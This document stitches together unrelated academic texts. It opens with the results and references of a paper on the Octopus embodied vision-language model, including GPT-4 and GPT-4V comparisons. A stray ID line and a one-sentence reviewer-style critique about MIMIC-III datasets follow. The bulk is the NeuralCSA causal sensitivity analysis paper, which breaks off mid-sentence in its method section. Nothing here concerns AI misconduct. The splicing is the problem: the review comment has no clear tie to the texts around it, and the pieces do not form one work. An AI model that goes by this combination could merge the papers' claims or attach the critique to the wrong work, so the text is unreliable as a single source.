sequence of image inputs, consisting of eight circularly captured first-person view (FPV) images, complemented by two bird’s-eye view (BEV) images. With the intent to investigate the impact of visual inputs on task performance, we initiated an ablation study. In a modified setup, the sequence of these visual inputs was deliberately randomized, aiming to attenuate the strength of the visual signals. As illustrated in Figure 5 (c), this intentional disruption in visual input consistency led to a pronounced decline in task performance. This result highlights the crucial role that clear and structured visual inputs play in the Octopus model, emphasizing that it significantly leverages visual cues for effective planning and task execution. 5.3 PERFORMANCE OF GPT-4 AND GPT-4V Performance of GPT-4 The input provided to GPT-4 was consistent with the input during our data collection phase, which was purely textual. Under such conditions, out of a total of 60 test tasks, GPT-4 achieved a commendable success rate in 31 tasks. This result suggests that current models still possess considerable room for advancement. The fact that even GPT-4 doesn’t perform optimally indicates a vast scope for improvements within the domain. Performance of GPT-4V Though we couldn’t extensively test GPT-4V due to API limitations, our sample case indicates its ability to generate code on par with Octopus when provided with image-based environment messages. However, while Octopus, having been trained in the present environment, adeptly performs tasks like “open the cabinet”, GPT-4V’s actions, shown in Figure A1 (e), although seemingly accurate, fall short in specific tasks such as locating the target object - the carboy. Given GPT-4V’s zero-shot learning approach and its unfamiliarity with our environment, alongside potential simulator discrepancies, its results remain commendable. 5.4 TRANSFERABILITY ON GTA TASKS To examine Octopus’s adaptability in novel environments, we transitioned the model initially trained on OctoGibson to tasks within the GTA framework. We observed that even in a few-shot scenario, Octopus demonstrates commendable performance and can complete 4 out of the 11 test tasks. REFERENCES Grand theft auto v, 2014. Michael Ahn, Anthony Brohan, Noah Brown, Yevgen Chebotar, Omar Cortes, Byron David, Chelsea Finn, Chuyuan Fu, Keerthana Gopalakrishnan, Karol Hausman, Alex Herzog, Daniel Ho, Jasmine Hsu, Julian Ibarz, Brian Ichter, Alex Irpan, Eric Jang, Rosario Jauregui Ruano, Kyle Jeffrey, Sally Jesmonth, Nikhil Joshi, Ryan Julian, Dmitry Kalashnikov, Yuheng Kuang, Kuang-Huei Lee, Sergey Levine, Yao Lu, Linda Luu, Carolina Parada, Peter Pastor, Jornell Quiambao, Kanishka Rao, Jarek Rettinghouse, Diego Reyes, Pierre Sermanet, Nicolas Sievers, Clayton Tan, Alexander Toshev, Vincent Vanhoucke, Fei Xia, Ted Xiao, Peng Xu, Sichun Xu, Mengyuan Yan, and Andy Zeng. Do as i can and not as i say: Grounding language in robotic affordances. In arXiv preprint arXiv:2204.01691, 2022. Jean-Baptiste Alayrac, Jeff Donahue, Pauline Luc, Antoine Miech, Iain Barr, Yana Hasson, Karel Lenc, Arthur Mensch, Katherine Millican, Malcolm Reynolds, et al. Flamingo: a visual language model for few-shot learning. Advances in Neural Information Processing Systems, 35:23716–23736, 2022. Anas Awadalla, Irena Gao, Josh Gardner, Jack Hessel, Yusuf Hanafy, Wanrong Zhu, Kalyani Marathe, Yonatan Bitton, Samir Gadre, Shiori Sagawa, Jenia Jitsev, Simon Kornblith, Pang Wei Koh, Gabriel Ilharco, Mitchell Wortsman, and Ludwig Schmidt. Openflamingo: An open-source framework for training large autoregressive vision-language models. arXiv preprint arXiv:2308.01390, 2023. Greg Brockman, Vicki Cheung, Ludwig Pettersson, Jonas Schneider, John Schulman, Jie Tang, and Wojciech Zaremba. Openai gym. arXiv preprint arXiv:1606.01540, 2016. Anthony Brohan, Noah Brown, Justice Carbajal, Yevgen Chebotar, Xi Chen, Krzysztof Choromanski, Tianli Ding, Danny Driess, Avinava Dubey, Chelsea Finn, et al. Rt-2: Vision-language-action models transfer web knowledge to robotic control. arXiv preprint arXiv:2307.15818, 2023. Tom Brown, Benjamin Mann, Nick Ryder, Melanie Subbiah, Jared D Kaplan, Prafulla Dhariwal, Arvind Neelakantan, Pranav Shyam, Girish Sastry, Amanda Askell, et al. Language models are few-shot learners. Advances in neural information processing systems, 33:1877–1901, 2020. Angel Chang, Angela Dai, Thomas Funkhouser, Maciej Halber, Matthias Niessner, Manolis Savva, Shuran Song, Andy Zeng, and Yinda Zhang. Matterport3d: Learning from rgb-d data in indoor environments. arXiv preprint arXiv:1709.06158, 2017. Liangyu Chen, Bo Li, Sheng Shen, Jingkang Yang, Chunyuan Li, Kurt Keutzer, Trevor Darrell, and Ziwei Liu. Language models are visual reasoning coordinators. In ICLR 2023 Workshop on Mathematical and Empirical Understanding of Foundation Models, 2023. Wei-Lin Chiang, Zhuohan Li, Zi Lin, Ying Sheng, Zhanghao Wu, Hao Zhang, Lianmin Zheng, Siyuan Zhuang, Yonghao Zhuang, Joseph E Gonzalez, et al. Vicuna: An open-source chatbot impressing gpt-4 with 90%* chatgpt quality. See https://vicuna.lmsys.org (accessed 14 April 2023), 2023. Wenliang Dai, Junnan Li, Dongxu Li, Anthony Meng Huat Tiong, Junqi Zhao, Weisheng Wang, Boyang Li, Pascale Fung, and Steven Hoi. Instructblip: Towards general-purpose vision-language models with instruction tuning. arXiv preprint arXiv:2305.06500, 2023. Danny Driess, Fei Xia, Mehdi S. M. Sajjadi, Corey Lynch, Aakanksha Chowdhery, Brian Ichter, Ayyaan Wahid, Jonathan Tompson, Quan Vuong, Tianhe Yu, Wenlong Huang, Yevgen Chebotar, Pierre Sermanet, Daniel Duckworth, Sergey Levine, Vincent Vanhoucke, Karol Hausman, Marc Toussaint, Klaus Greff, Andy Zeng, Igor Mordatch, and Pete Florence. Palm-e: An embodied multimodal language model. In arXiv preprint arXiv:2303.03378, 2023. Haoyuan Fu, Wenqiang Xu, Ruolin Ye, Han Xue, Zhenjun Yu, Tutian Tang, Yutong Li, Wenxin Du, Jieyi Zhang, and Cewu Lu. Rfuniverse: A multiphysics simulation platform for embodied ai, 2023.
ikX6D1oM1c
The experiments, to some extent, appear to be lacking in comprehensiveness. The semi-synthetic datasets utilized in this study are exclusively derived from the MIMIC-III dataset. The findings derived from this single source may not offer an adequate illustration of the model's performance.
A NEURAL FRAMEWORK FOR GENERALIZED CAUSAL SENSITIVITY ANALYSIS Dennis Frauen\textsuperscript{1, 2, 6} Fergus Imrie\textsuperscript{3} Alicia Curth\textsuperscript{4} Valentyn Melnychuk\textsuperscript{1, 2} Stefan Feuerriegel\textsuperscript{1, 2} Mihaela van der Schaar\textsuperscript{4, 5} ABSTRACT Unobserved confounding is common in many applications, making causal inference from observational data challenging. As a remedy, causal sensitivity analysis is an important tool to draw causal conclusions under unobserved confounding with mathematical guarantees. In this paper, we propose \textsc{NeuralCSA}, a neural framework for generalized causal sensitivity analysis. Unlike previous work, our framework is compatible with (i) a large class of sensitivity models, including the marginal sensitivity model, $f$-sensitivity models, and Rosenbaum’s sensitivity model; (ii) different treatment types (i.e., binary and continuous); and (iii) different causal queries, including (conditional) average treatment effects and simultaneous effects on multiple outcomes. The generality of \textsc{NeuralCSA} is achieved by learning a latent distribution shift corresponding to a treatment intervention using two conditional normalizing flows. We provide theoretical guarantees that \textsc{NeuralCSA} can infer valid bounds on the causal query of interest and also demonstrate this empirically using both simulated and real-world data. 1 INTRODUCTION Causal inference from observational data is central to many fields such as medicine (Frauen et al., 2023a; Feuerriegel et al., 2024), economics (Imbens & Angrist, 1994), or marketing (Varian, 2016). However, the presence of unobserved confounding often renders causal inference challenging (Pearl, 2009). As an example, consider an observational study examining the effect of smoking on lung cancer risk, where potential confounders, such as genetic factors influencing smoking behavior and cancer risk (Erzurumluoglu & et al., 2020), are not observed. Then, the causal relationship is not identifiable, and point identification without additional assumptions is impossible (Pearl, 2009). Causal sensitivity analysis offers a remedy by moving from point identification to partial identification. To do so, approaches for causal sensitivity analysis first impose assumptions on the strength of unobserved confounding through so-called sensitivity models (Rosenbaum, 1987; Imbens, 2003) and then obtain bounds on the causal query of interest. Such bounds often provide insights that the causal quantities cannot reasonably be explained away by unobserved confounding, which is sufficient for consequential decision-making in many applications (Kallus et al., 2019). Existing works on causal sensitivity analysis can be loosely grouped by problem settings. These vary across (1) sensitivity models, such as the marginal sensitivity model (MSM) (Tan, 2006), $f$-sensitivity model (Jin et al., 2022), and Rosenbaum’s sensitivity model (Rosenbaum, 1987); (2) treatment type (i.e., binary and continuous); and (3) causal query of interest. Causal queries may include (conditional) average treatment effects (CATE), but also distributional effects or simultaneous effects on multiple outcomes. Existing works typically focus on a specific sensitivity model, treatment type, and causal query (Table 1). However, none is applicable to all settings within (1)–(3). \textsuperscript{1} LMU Munich \textsuperscript{2} Munich Center for Machine Learning \textsuperscript{3} UCLA \textsuperscript{4} University of Cambridge \textsuperscript{5} Alan Turing Institute \textsuperscript{6} Corresponding author ([email protected]) To fill this gap, we propose NEURALCSA, a neural framework for causal sensitivity analysis that is applicable to numerous sensitivity models, treatment types, and causal queries, including multiple outcome settings. For this, we define a large class of sensitivity models, which we call generalized treatment sensitivity models (GTSMs). GTSMs include common sensitivity models such as the MSM, $f$-sensitivity models, and Rosenbaum’s sensitivity model. The intuition behind GTSMs is as follows: when intervening on the treatment $A$, the $U \rightarrow A$ edge is removed in the corresponding causal graph, which leads to a distribution shift in the latent confounders $U$ (see Fig. 1). GTSMs then impose restrictions on this latent distribution shift, which corresponds to assumptions on the “strength” of unobserved confounding. Figure 1: Idea behind NEURALCSA to learn the latent distribution shift due to treatment intervention ($\lambda$). Orange nodes denote observed (random) variables. Blue nodes denote unobserved variables pre-intervention. Green nodes indicate unobserved variables post-intervention under a GTSM $\mathcal{M}$. Observed confounders $X$ are empty for simplicity. NEURALCSA is compatible with any sensitivity model that can be written as a GTSM. This is crucial in practical applications, where sensitivity models correspond to different assumptions on the data-generating process and may lead to different results (Yin et al., 2022). To achieve this, NEURALCSA learns the latent distribution shift in the unobserved confounders from Fig. 1 using two separately trained conditional normalizing flows (CNFs). This is different from previous works for causal sensitivity analysis, which do not provide a unified approach across numerous sensitivity models, treatment types, and causal queries. We provide theoretical guarantees that NEURALCSA learns valid bounds on the causal query of interest and demonstrate this empirically. Our contributions are: (1) We define a general class of sensitivity models, called GTSMs. (2) We propose NEURALCSA, a neural framework for causal sensitivity analysis under any GTSMs. NEURALCSA is compatible with various sensitivity models, treatment types, and causal queries. In particular, NEURALCSA is applicable in settings for which bounds are not analytically tractable and no solutions exist yet. (3) We provide theoretical guarantees that NEURALCSA learns valid bounds on the causal query of interest and demonstrate the effectiveness of our framework empirically. 2 RELATED WORK In the following, we provide an overview of related literature on partial identification and causal sensitivity analysis. A more detailed overview, including literature on point identification and estimation, can be found in Appendix A. Partial identification: The aim of partial identification is to compute bounds on causal queries whenever point identification is not possible, such as under unobserved confounding (Manski, 1990). There are several literature streams that impose different assumptions on the data-generating process in order to obtain informative bounds. One stream addresses partial identification for general causal graphs with discrete variables (Duarte et al., 2023). Another stream assumes the existence of valid instrumental variables (Gunsilius, 2020; Klibertus et al., 2020). Recently, there has been a growing interest in using neural networks for partial identification (Xia et al., 2021, 2023; Padh et al., 2023). However, none of these methods allow for incorporating sensitivity models and sensitivity analysis. Table 1: Overview of key settings for causal sensitivity analyses and whether covered by existing literature (√) or not (×). Treatments are either binary or continuous. Details are in Appendix A. | Sensitivity model | MSM | $f$-sensitivity | Rosenbaum | |-------------------|-----|----------------|-----------| | Causal query | | | | | Binary | √ | √ | √ | | Cont. | × | × | × | | Distributional effects | √ | √ | √ | | Interventional density | √ | (√) | × | | Multiple outcomes | × | × | × | † The MSM for continuous treatment is also called continuous MSM (CMSM) (esson et al., 2022). 7 Code is available at https://github.com/DennisFrauen/NeuralCSA Causal sensitivity analysis: Causal sensitivity analysis addresses the partial identification of causal queries by imposing assumptions on the strength of unobserved confounding via sensitivity models. It dates back to Cornfield et al. (1959), who showed that unobserved confounding could not reasonably explain away the observed effect of smoking on lung cancer risk. Existing works can be grouped along three dimensions: (1) the sensitivity model, (2) the treatment type, and (3) the causal query of interest (see Table 1 details in Appendix A). Popular sensitivity models include Rosenbaum’s sensitivity model (Rosenbaum [1987]), the marginal sensitivity model (MSM) (Tan [2006]), and $f$-sensitivity models (Jin et al. [2022]). Here, most methods have been proposed for binary treatments and conditional average treatment effects (Kallus et al. [2019], Zhao et al. [2019], Jesson et al. [2021], Dorn & Guo [2022], Dorn et al. [2022], Oprescu et al. [2023]). Extensions under the MSM have been proposed for continuous treatments (Jesson et al. [2022], Marmarelis et al. [2023a]) and individual treatment effects (Yin et al. [2022], Jin et al. [2023], Marmarelis et al. [2023b]). However, approaches for many settings are still missing (shown by $\times$ in Table 1). In an attempt to generalize causal sensitivity analysis, Frauen et al. (2023b) provided bounds for different treatment types (i.e., binary, continuous) and causal queries (e.g., CATE, distributional effects but not multiple outcomes). Yet, the results are limited to MSM-type sensitivity models. To the best of our knowledge, no previous work proposes a unified solution for obtaining bounds under various sensitivity models (e.g., MSM, $f$-sensitivity, Rosenbaum’s), treatment types (i.e., binary and continuous), and causal queries (e.g., CATE, distributional effects, interventional densities, and simultaneous effects on multiple outcomes). 3 MATHEMATICAL BACKGROUND Notation: We denote random variables $X$ as capital letters and their realizations $x$ in lowercase. We further write $P(x)$ for the probability mass function if $X$ is discrete, and for the probability density function with respect to the Lebesgue measure if $X$ is continuous. Conditional probability mass functions/ densities $P(Y = y \mid X = x)$ are written as $P(y \mid x)$. Finally, we denote the conditional distribution of $Y \mid X = x$ as $P(Y \mid x)$ and its expectation as $E[Y \mid x]$. 3.1 Problem setup Data generating process: We consider the standard setting for (static) treatment effect estimation under unobserved confounding (Dorn & Guo [2022]). That is, we have observed confounders $X \in \mathcal{X} \subseteq \mathbb{R}^{d_x}$, unobserved confounders $U \in \mathcal{U} \subseteq \mathbb{R}^{d_u}$, treatments $A \in \mathcal{A} \subseteq \mathbb{R}^{d_a}$, and outcomes $Y \in \mathcal{Y} \subseteq \mathbb{R}^{d_y}$. Note that we allow for (multiple) discrete or continuous treatments and multiple outcomes, i.e., $d_a, d_y \geq 1$. The underlying causal graph is shown in Fig. 2. We have access to an observational dataset $D = (x_i, a_i, y_i)_{i=1}^n$ sampled i.i.d. from the observational distribution $(X, A, Y) \sim P_{\text{obs}}$. The full distribution $(X, U, A, Y) \sim P$ is unknown. We use the potential outcomes framework to formalize the causal inference problem (Rubin [1974]) and denote $Y(a)$ as the potential outcome when intervening on the treatment and setting it to $A = a$. We impose the following standard assumptions (Dorn & Guo [2022]). Assumption 1. We assume that for all $x \in \mathcal{X}$ and $a \in \mathcal{A}$ the following three conditions hold: (i) $A = a$ implies $Y(a) = Y$ (consistency); (ii) $P(a \mid x) > 0$ (positivity); and (iii) $Y(a) \perp \! \! \! \perp A \mid X, U$ (latent unconfoundedness). Causal queries: We are interested in a wide range of general causal queries. We formalize them as functionals $Q(x, a, P) = F(P(Y(a) \mid x))$, where $F$ is a functional that maps the potential outcome distribution $P(Y(a) \mid x)$ to a real number (Frauen et al. [2023b]). Thereby, we cover various queries from the causal inference literature. For example, by setting $F = E[\cdot]$, we obtain the conditional expected potential outcomes/ dose-response curves $Q(x, a, P) = E[Y(a) \mid x]$. We can also obtain distributional versions of these queries by setting $F$ to a quantile instead of the expectation. Furthermore, our methodology will also apply to queries that can be obtained by averaging or taking differences. For binary treatments $A \in \{0, 1\}$, the query $\tau(x) = E[Y(1) \mid x] - E[Y(0) \mid x]$ is called the conditional average treatment effect (CATE), and its averaged version \( \int \tau(x)P(x) \, dx \) the average treatment effect (ATE). Our formalization also covers simultaneous effects on multiple outcomes (i.e., \( d_y \geq 2 \)). Consider query \( Q(x, a, P) = P(Y(a) \in S \mid x) \), which is the probability that the outcome \( Y(a) \) is contained in some set \( S \subseteq Y \) after intervening on the treatment. For example, consider two potential outcomes \( Y_1(a) \) and \( Y_2(a) \) denoting blood pressure and heart rate, respectively. We then might be interested in \( P(Y_1(a) \leq t_1, Y_2(a) \leq t_2 \mid x) \), where \( t_1 \) and \( t_2 \) are critical threshold values (see Sec. 6). ### 3.2 Causal Sensitivity Analysis Causal sensitivity analysis builds upon sensitivity models that restrict the possible strength of unobserved confounding (e.g., Rosenbaum & Rubin [1983a]). Formally, we define a sensitivity model as a family of distributions of \((X, U, A, Y)\) that induce the observational distribution \( P_{\text{obs}} \). **Definition 1.** A sensitivity model \( M \) is a family of probability distributions \( P \) defined on \( X \times U \times A \times Y \) for arbitrary finite-dimensional \( U \) so that \( \int_U P(x, u, a, y) \, du = P_{\text{obs}}(x, a, y) \) for all \( P \in M \). **Task:** Given a sensitivity model \( M \) and an observational distribution \( P_{\text{obs}} \), the aim of causal sensitivity analysis is to solve the partial identification problem \[ Q^+_M(x, a) = \sup_{P \in M} Q(x, a, P) \quad \text{and} \quad Q^-_M(x, a) = \inf_{P \in M} Q(x, a, P). \] By its definition, the interval \([Q^-_M(x, a), Q^+_M(x, a)]\) is the tightest interval that is guaranteed to contain the ground-truth causal query \( Q(x, a, P) \) while satisfying the sensitivity constraints. We can also obtain bounds for averaged causal queries and differences via \( \int Q^+_M(x, a)P(x) \, dx \) and \( Q^+_M(x, a_1) - Q^+_M(x, a_2) \) (see Appendix D for details). **Sensitivity models from the literature:** We now recap three types of prominent sensitivity models from the literature, namely, the MSM, \( f \)-sensitivity models, and Rosenbaum’s sensitivity model. These are designed for binary treatments \( A \in \{0, 1\} \). To formalize them, we first define the odds ratio \( \text{OR}(a, b) = \frac{a}{(1-a)} \left( \frac{1-b}{b} \right) \), the observed propensity score \( \pi(x) = P(A = 1 \mid x) \), and the full propensity score \( \pi(x, u) = P(A = 1 \mid x, u) \). Then, the definitions are: 1. **The marginal sensitivity model (MSM)** ([Tan, 2006]) is defined as the family of all \( P \) that satisfy \( \frac{1}{\Gamma} \leq \text{OR}(\pi(x), \pi(x, u)) \leq \Gamma \) for all \( x \in X \) and \( u \in U \) and a sensitivity parameter \( \Gamma \geq 1 \). 2. **\( f \)-sensitivity models** ([Jin et al., 2022]) build upon a given convex function \( f : \mathbb{R}_{>0} \to \mathbb{R} \) with \( f(1) = 0 \) and are defined via \( \max \left\{ \int_U f(\text{OR}(\pi(x), \pi(x, u))) \, P(u \mid x, A = 1) \, du, \int_U f(\text{OR}^{-1}(\pi(x), \pi(x, u))) \, P(u \mid x, A = 1) \, du \right\} \leq \Gamma \) for all \( x \in X \). 3. **Rosenbaum’s sensitivity model** ([Rosenbaum, 1987]) is defined via \( \frac{1}{\Gamma} \leq \text{OR}(\pi(x, u_1), \pi(x, u_2)) \leq \Gamma \) for all \( x \in X \) and \( u_1, u_2 \in U \). **Interpretation and choice of \( \Gamma \):** In the above sensitivity models, the sensitivity parameter \( \Gamma \) controls the strength of unobserved confounding. Both MSM and Rosenbaum’s sensitivity model bound on odds-ratio uniformly over all \( u \in U \), while the \( f \)-sensitivity model bounds an integral over \( u \). We refer to Appendix C for further differences. Setting \( \Gamma = 1 \) in the above sensitivity models corresponds to unconfoundedness and thus point identification. For \( \Gamma > 1 \), point identification is not possible, and we need to solve the partial identification problem from Eq. (1) instead. In practice, one typically chooses \( \Gamma \) by domain knowledge or data-driven heuristics ([Kallus et al., 2019]; [Hatt et al., 2022]). For example, a common approach in practice is to determine the smallest \( \Gamma \) so that the partially identified interval \([Q^-_M(x, a), Q^+_M(x, a)]\) includes 0. Then, \( \Gamma \) can be interpreted as a level of “causal uncertainty”, quantifying the smallest violation of unconfoundedness that would explain away the causal effect ([Jesson et al., 2021]; [Jin et al., 2023]). --- 8 Corresponding sensitivity models for continuous treatments can be defined by replacing the odds ratio with the density ratio \( \text{DR}(a, b) = \frac{\rho_a}{\rho_b} \) and the propensity scores with the densities \( \rho(a \mid x) \) and \( \rho(a \mid x, u) \) ([Bonvini et al., 2022]; [Jesson et al., 2022]). We refer to Appendix C for details and further examples of sensitivity models. 4 THE GENERALIZED TREATMENT SENSITIVITY MODEL (GTSM) We now define our generalized treatment sensitivity model (GTSM). The GTSM subsumes a large class of sensitivity models and includes MSM, \( f \)-sensitivity, and Rosenbaum’s sensitivity model). **Motivation:** Intuitively, we define the GTSM so that it includes all sensitivity models that restrict the latent distribution shift in the confounding space due to the treatment intervention (see Fig. 1). To formalize this, we can write the observational outcome density under Assumption I as \[ P_{\text{obs}}(y \mid x, a) = \int P(y \mid x, u, a) P(u \mid x, a) \, du. \] Eq. (2) and (3) imply that \( P_{\text{obs}}(y \mid x, a) \) and \( P(Y(a) = y \mid x) \) only differ by the densities \( P(u \mid x, a) \) and \( P(U \mid x) \) under the integrals (colored red and orange). If the distributions \( P(U \mid x, a) \) and \( P(U \mid x) \) would coincide, it would hold that \( P(Y(a) = y \mid x) = P_{\text{obs}}(y \mid x, a) \) and the potential outcome distribution would be identified. This suggests that we should define sensitivity models by measuring deviations from unconfoundedness via the shift between \( P(U \mid x, a) \) and \( P(U \mid x) \). **Definition 2.** A generalized treatment sensitivity model (GTSM) is a sensitivity model \( M \) that contains all probability distributions \( P \) that satisfy \( D_{x,a}(P(U \mid x), P(U \mid x, a)) \leq \Gamma \) for a functional of distributions \( D_{x,a} \), a sensitivity parameter \( \Gamma \in \mathbb{R}_{\geq 0} \), and all \( x \in X \) and \( a \in A \). **Lemma 1.** The MSM, the \( f \)-sensitivity model, and Rosenbaum’s sensitivity model are GTSMs. The class of all GTSMs is still too large for meaningful sensitivity analysis. This is because the sensitivity constraint may not be invariant w.r.t. transformations (e.g., scaling) of the latent space \( U \). **Definition 3 (Transformation-invariance).** A GTSM \( M \) is transformation-invariant if it satisfies \( D_{x,a}(P(U \mid x), P(U \mid x, a)) \geq D_{x,a}(P(t(U) \mid x), P(t(U) \mid x, a)) \) for any measurable function \( t : U \rightarrow \tilde{U} \) to another latent space \( \tilde{U} \). Transformation-invariance is necessary for meaningful sensitivity analysis because it implies that once we choose a latent space \( U \) and a sensitivity parameter \( \Gamma \), we cannot find a transformation to another latent space \( \tilde{U} \) so that the induced distribution on \( \tilde{U} \) violates the sensitivity constraint. All sensitivity models we consider in this paper are transformation-invariant, as stated below. **Lemma 2.** The MSM, \( f \)-sensitivity models, and Rosenbaum’s sensitivity model are transformation-invariant. 5 NEURAL CAUSAL SENSITIVITY ANALYSIS We now introduce our neural approach to causal sensitivity analysis as follows. First, we simplify the partial identification problem from Eq. (1) under a GTSM and propose a (model-agnostic) two-stage procedure (Sec. 5.1). Then, we provide theoretical guarantees for our two-stage procedure (Sec. 5.2). Finally, we instantiate our neural framework called NeurAlCSA (Sec. 5.3). 5.1 SENSITIVITY ANALYSIS UNDER A GTSM **Motivation:** Recall that, by definition, a GTSM imposes constraints on the distribution shift in the latent confounders due to treatment intervention (Fig. 1). Our idea is to propose a two-stage procedure, where Stage 1 learns the observational distribution (Fig. 1 left), while Stage 2 learns the shifted distribution of \( U \) after intervening on the treatment under a GTSM (Fig. 1 right). In Sec. 5.2 we will see that, under weak assumptions, learning this distribution shift in separate stages is guaranteed to lead to the bounds \( Q^+_M(x, a) \) and \( Q^-_M(x, a) \). To formalize this, we start by simplifying the partial identification problem from Eq. (1) for a GTSM \( M \). Simplifying Eq. (1): We begin by rewriting Eq. (1) using the GTSM definition. Without loss of generality, we consider the upper bound $Q^+_M(x, a)$. Recall that Eq. (1) seeks to maximize over all probability distributions that are compatible both with the observational data and with the sensitivity model. However, note that any GTSM only restricts the $U \rightarrow A$ part of the distribution, not the $U \rightarrow Y$ part. Hence, we can use Eq. (3) and Eq. (2) to write the upper bound as $$Q^+_M(x, a) = \sup_{\{P(U | x, a')\}_{a' \neq a}} \sup_{\{P(Y | x, u, a)\}_{u \in U}} F \left( \int P(Y | x, u, a)P(u | x) \, du \right),$$ where we maximize over (families of) probability distributions $\{P(U | x, a')\}_{a' \neq a}$ (left supremum), and $P(U | x, a)$, $\{P(Y | x, u, a)\}_{u \in U}$ (right supremum). The coloring indicates the components that appear in the causal query/objective. The constraint in the right supremum ensures that the respective components of the full distribution $P$ are compatible with the observational data, while the constraints in the left supremum ensure that the respective components are compatible with both observational data and the sensitivity model. The partial identification problem from Eq. (4) is still hard to solve as it involves two nested constrained optimization problems. However, we can further simplify Eq. (4): We will show in Sec. 5.2 that we can replace the right supremum with fixed distributions $P^*(U | x, a)$ and $P^*(Y | x, a, u)$ for all $u \in U \subseteq \mathbb{R}^{d_y}$ so that Eq. (2) holds. Then, Eq. (4) reduces to a single constrained optimization problem (left supremum). Moreover, we will show that we can choose $P^*(Y | x, a, u) = \delta(Y - f^*_{x,a}(u))$ as a delta-distribution induced by an invertible function $f^*_{x,a}: U \rightarrow Y$. The constraint in Eq. (2), that ensures compatibility with the observational data then reduces to $P_{obs}(Y | x, a) = P^*(f^*_{x,a}(U) | x, a)$. This motivates the following two-stage procedure (see Fig. 3). Two-stage procedure: In Stage 1, we fix $P^*(U | x, a)$ and fix an invertible function $f^*_{x,a}: U \rightarrow Y$ so that $P_{obs}(Y | x, a) = P^*(f^*_{x,a}(U) | x, a)$ holds. That is, the induced push-forward distribution of $P^*(U | x, a)$ under $f^*_{x,a}$ must coincide with the observational distribution $P_{obs}(Y | x, a)$. The existence of such a function is always guaranteed (Chen & Gopinath [2000]). In Stage 2, we then set $P(U | x, a) = P^*(U | x, a)$ and $P(Y | x, a, u) = P^*(Y | x, a, u)$ in Eq. (4) and only optimize over the left supremum. That is, we write stage 2 for discrete treatments as $$\sup_{P(u | x, A \neq a)} F \left( P(f^*_{x,a}(U) | x) \right),$$ where we maximize over the distribution $P(u | x, A \neq a)$ for a fixed treatment intervention $a$. For continuous treatments, we can directly take the supremum over $P(u | x)$. 5.2 Theoretical guarantees We now provide a formal result that our two-stage procedure returns valid solutions to the partial identification problem from Eq. (4). The following theorem states that Stage 2 of our procedure is able to attain the optimal upper bound $Q^+_M(x, a)$ from Eq. (4), even after fixing the distributions $P^*(U | x, a)$ and $P^*(Y | x, a, u)$ as done in Stage 1. A proof is provided in Appendix B. **Theorem 1 (Sufficiency of two-stage procedure).** Let $M$ be a transformation-invariant GTSM. For fixed $x \in X$ and $a \in A$, let $P^*(U | x, a)$ be a fixed distribution on $U = \mathbb{R}^{d_u}$ and $f^*_{x,a}: U \rightarrow Y$ a fixed invertible function so that $P_{obs}(Y | x, a) = P^*(f^*_{x,a}(U) | x, a)$. Let $P^*$ denote the space of all full probability distributions $P$ that induce $P^*(U | x, a)$ and $P^*(Y | x, a, u) = \delta(Y - f^*_{x,a}(u))$ and that satisfy $P^* \in M$. Then, under Assumption 7, it holds that $Q^+_M(x, a) = \sup_{P^* \in P^*} Q(x, a, P^*)$ and $Q_M(x, a) = \inf_{P^* \in P^*} Q(x, a, P^*)$. **Intuition:** Theorem 1 has two major implications: (i) It is sufficient to fix the distributions \( P^*(U \mid x, a) \) and \( P^*(Y \mid x, u, a) \), i.e., the components in the right supremum of Eq. (4) and only optimize over the left supremum; and (ii) it is sufficient to choose \( P^*(Y \mid x, u, a) = \delta(Y - f_{x,a}^*(u)) \) as a delta-distribution induced by an invertible function \( f_{x,a}^* : U \to Y \), which satisfies the data-compatibility constraint \( P_{\text{obs}}(Y \mid x, a) = P^*(f_{x,a}^*(U) \mid x, a) \). **Intuition for (i):** In Eq. (4), we optimize jointly over all components of the full distribution. This suggests that there are multiple solutions that differ only in the components of unobserved parts of \( P \) (i.e., in \( U \)) but lead to the same potential outcome distribution and causal query. Theorem 1 states that we may restrict the space of possible solutions by fixing the components \( P^*(U \mid x, a) \) and \( P^*(Y \mid x, a, u) \), without losing the ability to attain the optimal upper bound \( Q_M^+(x, a) \) from Eq. (4). **Intuition for (ii):** We cannot pick any \( P^*(Y \mid x, a, u) \) that satisfies Eq. (2). For example, any distribution that induces \( Y \perp\!\!\!\perp U \mid X, A \) would satisfy Eq. (2), but implies unconfoundedness and would thus not lead to a valid upper bound \( Q_M^+(x, a) \). Intuitively, we have to choose a \( P(Y \mid x, a, u) \) that induces “maximal dependence” (mutual information) between \( U \) and \( Y \) (conditioned on \( X \) and \( A \)), because the GTSM does not restrict this part of the full probability distribution \( P \). The maximal mutual information is achieved if we choose \( P(Y \mid x, a, u) = \delta(Y - f_{x,a}^*(u)) \). ### 5.3 Neural Instantiation: NeurAlCSA We now provide a neural instantiation called NeurAlCSA for the above two-stage procedure using conditional normalizing flows (CNFs) (Winkler et al., 2019). The architecture of NeurAlCSA is shown in Fig. 4. NeurAlCSA instantiates the two-step procedure as follows: **Stage 1:** We fix \( P^*(U \mid x, a) \) to the standard normal distribution on \( U = \mathbb{R}^{d_u} \). Our task is then to learn an invertible function \( f_{x,a}^* : U \to Y \) that maps the standard Gaussian distribution on \( U \) to \( P_{\text{obs}}(Y \mid x, a) \). We model \( f_{x,a}^* \) as a CNF \( f_{g_\theta^*(x,a)}^* \), where \( f^* \) is a normalizing flow (Rezende & Mohamed, 2015), for which the parameters are the output of a fully connected neural network \( g_\theta^* \), which itself is parametrized by \( \theta \) (Winkler et al., 2019). We obtain \( \theta \) by maximizing the empirical Stage 1 loss \( L_1(\theta) = \sum_{i=1}^n \log P(f_{g_\theta^*(x,a,i)}^*(U) = y_i) \), where \( U \sim N(0_{d_u}, I_{d_u}) \) is standard normally distributed. The stage 1 loss can be computed analytically via the change-of-variable formula (see Appendix F). **Stage 2:** In Stage 2, we need to maximize over distributions on \( U \) in the latent space \( U \) that maximize the causal query \( F(P(f_{g_\theta^*(x,a)}^*(U) \mid x)) \), where \( \theta_{\text{opt}} \) is a solution from maximizing \( L_1(\theta) \) in stage 1. We can do this by learning a second CNF \( \tilde{f}_{g_\eta(x,a)} \), where \( \tilde{f} : \tilde{U} \to U \) is a normalizing flow that maps a standard normally distributed auxiliary \( \tilde{U} \sim N(0_{d_u}, I_{d_u}) \) to the latent space \( U \), and whose parameters are the output of a fully connected neural network \( g_\eta \) parametrized by \( \eta \). The CNF \( \tilde{f}_{g_\eta(x,a)} \) from Stage 2 induces a new distribution on \( U \), which mimics the shift due to unobserved confounding when intervening instead of conditioning (i.e., going from Eq. (2) to Eq. (3)). We can compute the query under the shifted distribution by concatenating the Stage 2 CNF with the Stage 1 CNF and applying \( F \) to the shifted outcome distribution (see Fig. 4). More precisely, we optimize \( \eta \) 